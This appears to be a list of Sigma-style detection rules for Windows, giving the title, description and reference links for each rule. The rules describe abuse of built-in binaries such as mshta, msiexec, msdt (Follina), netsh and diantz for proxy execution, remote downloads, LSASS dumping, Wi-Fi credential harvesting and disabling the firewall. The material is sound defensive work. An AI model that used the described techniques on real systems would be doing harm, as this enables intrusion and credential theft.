Suspicious Diantz Alternate Data Stream Execution Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. https://lolbas-project.github.io/lolbas/Binaries/Diantz/
Suspicious Diantz Download and Compress Into a CAB File Download and compress a remote file and store it in a cab file on local machine. https://lolbas-project.github.io/lolbas/Binaries/Diantz/
Suspicious Extrac32 Execution Download or Copy file with Extrac32 https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
Suspicious Extrac32 Alternate Data Stream Execution Extract data from cab file and hide it in an alternate data stream https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
Gpscript Execution Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/, https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
Ie4uinit Lolbin Use From Invalid Path Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/, https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Launch-VsDevShell.PS1 Proxy Execution Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. https://twitter.com/nas_bench/status/1535981653239255040
Potential Manage-bde.wsf Abuse To Proxy Execution Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/, https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712, https://twitter.com/bohops/status/980659399495741441, https://twitter.com/JohnLaTwC/status/1223292479270600706, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md
Mavinject Inject DLL Into Running Process Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
MpiExec Lolbin Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary https://twitter.com/mrd0x/status/1465058133303246867, https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps
Execute Files with Msdeploy.exe Detects file execution using the msdeploy.exe lolbin https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/, https://twitter.com/pabraeken/status/995837734379032576, https://twitter.com/pabraeken/status/999090532839313408
Execute MSDT Via Answer File Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) https://lolbas-project.github.io/lolbas/Binaries/Msdt/
Use of OpenConsole Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting https://twitter.com/nas_bench/status/1537563834478645252
OpenWith.exe Executes Specified Binary The OpenWith.exe executes other binary https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml, https://twitter.com/harr0ey/status/991670870384021504
Use of Pcalua For Execution Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. https://lolbas-project.github.io/lolbas/Binaries/Pcalua/, https://pentestlab.blog/2020/07/06/indirect-command-execution/
Indirect Command Execution By Program Compatibility Wizard Detect indirect command execution via Program Compatibility Assistant pcwrun.exe https://twitter.com/pabraeken/status/991335019833708544, https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/
Execute Pcwrun.EXE To Leverage Follina Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability https://twitter.com/nas_bench/status/1535663791362519040
Code Execution via Pcwutl.dll Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/, https://twitter.com/harr0ey/status/989617817849876488
Execute Code with Pester.bat as Parent Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) https://twitter.com/Oddvarmoe/status/993383596244258816, https://twitter.com/_st0pp3r_/status/1560072680887525378
Execute Code with Pester.bat Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) https://twitter.com/Oddvarmoe/status/993383596244258816, https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md
PrintBrm ZIP Creation of Extraction Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
Pubprn.vbs Proxy Execution Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. https://lolbas-project.github.io/lolbas/Scripts/Pubprn/
DLL Execution via Rasautou.exe Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. https://lolbas-project.github.io/lolbas/Binaries/Rasautou/, https://github.com/fireeye/DueDLLigence, https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
REGISTER_APP.VBS Proxy Execution Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. https://twitter.com/sblmsrsn/status/1456613494783160325?s=20
Use of Remote.exe Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/
Replace.exe Usage Detects the use of Replace.exe which can be used to replace file with another file https://lolbas-project.github.io/lolbas/Binaries/Replace/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace
Lolbin Runexehelper Use As Proxy Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs https://twitter.com/0gtweet/status/1206692239839289344, https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/
Suspicious Runscripthelper.exe Detects execution of powershell scripts via Runscripthelper.exe https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/
Use of Scriptrunner.exe The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/
Using SettingSyncHost.exe as LOLBin Detects using SettingSyncHost.exe to run hijacked binary https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin
Use Of The SFTP.EXE Binary As A LOLBIN Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag https://github.com/LOLBAS-Project/LOLBAS/pull/264
Suspicious Certreq Command to Download Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files https://lolbas-project.github.io/lolbas/Binaries/Certreq/
Suspicious Driver Install by pnputil.exe Detects when a possible suspicious driver is being installed via pnputil.exe lolbin https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax, https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html
Suspicious GrpConv Execution Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors https://twitter.com/0gtweet/status/1526833181831200770
Dumping Process via Sqldumper.exe Detects process dump via legitimate sqldumper.exe binary https://twitter.com/countuponsec/status/910977826853068800, https://twitter.com/countuponsec/status/910969424215232518, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/
SyncAppvPublishingServer Execute Arbitrary PowerShell Code Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
Potential DLL Injection Or Execution Using Tracker.exe Detects potential DLL injection and execution using "Tracker.exe" https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/
Use of TTDInject.exe Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/
Time Travel Debugging Utility Usage Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553
Lolbin Unregmp2.exe Use As Proxy Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/
UtilityFunctions.ps1 Proxy Dll Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/
Use of VisualUiaVerifyNative.exe VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/, https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Visual Basic Command Line Compiler Usage Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. https://lolbas-project.github.io/lolbas/Binaries/Vbc/
Use of VSIISExeLauncher.exe The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/
Use of Wfc.exe The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac
Potential Register_App.Vbs LOLScript Abuse Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. https://twitter.com/sblmsrsn/status/1456613494783160325?s=20, https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs
Potential Credential Dumping Via LSASS Process Clone Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/, https://twitter.com/Hexacorn/status/1420053502554951689, https://twitter.com/SBousseaden/status/1464566846594691073?s=20
Potential Mftrace.EXE Abuse Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/
MMC20 Lateral Movement Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
MMC Spawning Windows Shell Detects a Windows command line executable started from MMC https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
CodePage Modification Via MODE.COM To Russian Language Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware. https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior
Potential Suspicious Mofcomp Execution Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml, https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp
Potential Mpclient.DLL Sideloading Via Defender Binaries Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
File Download Via Windows Defender MpCmpRun.EXE Detects the use of Windows Defender MpCmdRun.EXE to download files https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866, https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
Suspicious Msbuild Execution By Uncommon Parent Process Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/, https://www.echotrail.io/insights/search/msbuild.exe
Windows Defender Definition Files Removed Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Potential Arbitrary Command Execution Using Msdt.EXE Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://twitter.com/_JohnHammond/status/1531672601067675648
Suspicious Cabinet File Execution Via Msdt.EXE Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 https://twitter.com/nas_bench/status/1537896324837781506, https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
Arbitrary File Download Via MSEDGE_PROXY.EXE Detects usage of "msedge_proxy.exe" to download arbitrary files https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/
Suspicious MSDT Parent Process Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/
Remotely Hosted HTA File Executed Via Mshta.EXE Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
Wscript Shell Run In CommandLine Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html, https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/
Suspicious JavaScript Execution Via Mshta.EXE Detects execution of javascript code using "mshta.exe". https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md
Potential LethalHTA Technique Execution Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process https://codewhitesec.blogspot.com/2018/07/lethalhta.html
Suspicious MSHTA Child Process Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution https://www.trustedsec.com/july-2015/malicious-htas/
MSHTA Suspicious Execution 01 Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism http://blog.sevagas.com/?Hacking-around-HTA-files, https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script, https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997, https://twitter.com/mattifestation/status/1326228491302563846
Suspicious Mshta.EXE Execution Patterns Detects suspicious mshta process execution patterns https://en.wikipedia.org/wiki/HTML_Application, https://www.echotrail.io/insights/search/mshta.exe, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
DllUnregisterServer Function Call Via Msiexec.EXE Detects MsiExec loading a DLL and calling its DllUnregisterServer function https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://lolbas-project.github.io/lolbas/Binaries/Msiexec/, https://twitter.com/_st0pp3r_/status/1583914515996897281
Suspicious MsiExec Embedding Parent Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
Suspicious Msiexec Execute Arbitrary DLL Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914515996897281
Msiexec Quiet Installation Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914244344799235
Suspicious Msiexec Quiet Install From Remote Location Detects usage of Msiexec.exe to install packages hosted remotely quietly https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
Potential MsiExec Masquerading Detects the execution of msiexec.exe from an uncommon directory https://twitter.com/200_okay_/status/1194765831911215104
MsiExec Web Install Detects suspicious msiexec process starts with web addresses as parameter https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
Arbitrary File Download Via MSOHTMED.EXE Detects usage of "MSOHTMED" to download arbitrary files https://github.com/LOLBAS-Project/LOLBAS/pull/238/files
Arbitrary File Download Via MSPUB.EXE Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files https://github.com/LOLBAS-Project/LOLBAS/pull/238/files
Potential Process Injection Via Msra.EXE Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/, https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf
Detection of PowerShell Execution via Sqlps.exe This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/, https://twitter.com/bryon_/status/975835709587075072
SQL Client Tools PowerShell Session Detection This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml, https://twitter.com/pabraeken/status/993298228840992768
Suspicious Child Process Of SQL Server Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. Internal Research
Suspicious Child Process Of Veeam Dabatase Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential MSTSC Shadowing Activity Detects RDP session hijacking by using MSTSC shadowing https://twitter.com/kmkz_security/status/1220694202301976576, https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet
New Remote Desktop Connection Initiated Via Mstsc.EXE Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc
Mstsc.EXE Execution With Local RDP File Detects potential RDP connection via Mstsc using a local ".rdp" file https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Suspicious Mstsc.EXE Execution With Local RDP File Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Mstsc.EXE Execution From Uncommon Parent Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Msxsl.EXE Execution Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/
Remote XSL Execution Via Msxsl.EXE Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/
New Firewall Rule Added Via Netsh.EXE Detects the addition of a new rule to the Windows firewall via netsh https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall https://www.virusradar.com/en/Win32_Kasidet.AD/description, https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100
RDP Connection Allowed Via Netsh.EXE Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
Firewall Rule Deleted Via Netsh.EXE Detects the removal of a port or application rule in the Windows Firewall configuration using netsh https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/
Firewall Disabled via Netsh.EXE Detects netsh commands that turns off the Windows firewall https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/, https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall
Netsh Allow Group Policy on Microsoft Defender Firewall Adversaries may modify system firewalls in order to bypass controls limiting network usage https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior
Firewall Configuration Discovery Via Netsh.EXE Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules, https://ss64.com/nt/netsh.html
Firewall Rule Update Via Netsh.EXE Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule https://ss64.com/nt/netsh.html
Potential Persistence Via Netsh Helper DLL Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md, https://github.com/outflanknl/NetshHelperBeacon, https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/
New Network Trace Capture Started Via Netsh.EXE Detects the execution of netsh with the "trace" flag in order to start a network capture https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/, https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/
New Port Forwarding Rule Added Via Netsh.EXE Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/
RDP Port Forwarding Rule Added Via Netsh.EXE Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
Harvesting Of Wifi Credentials Via Netsh.EXE Detect the harvesting of wifi credentials using netsh.exe https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
Suspicious Group And Account Reconnaissance Activity Using Net.EXE Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
Unmount Share Via Net.EXE Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
Start Windows Service Via Net.EXE Detects the usage of the "net.exe" command to start a service using the "start" flag https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md
New User Created Via Net.EXE Identifies the creation of local users via the net.exe command. https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
New User Created Via Net.EXE With Never Expire Option Detects creation of local users via the net.exe command with the option "never expire" https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
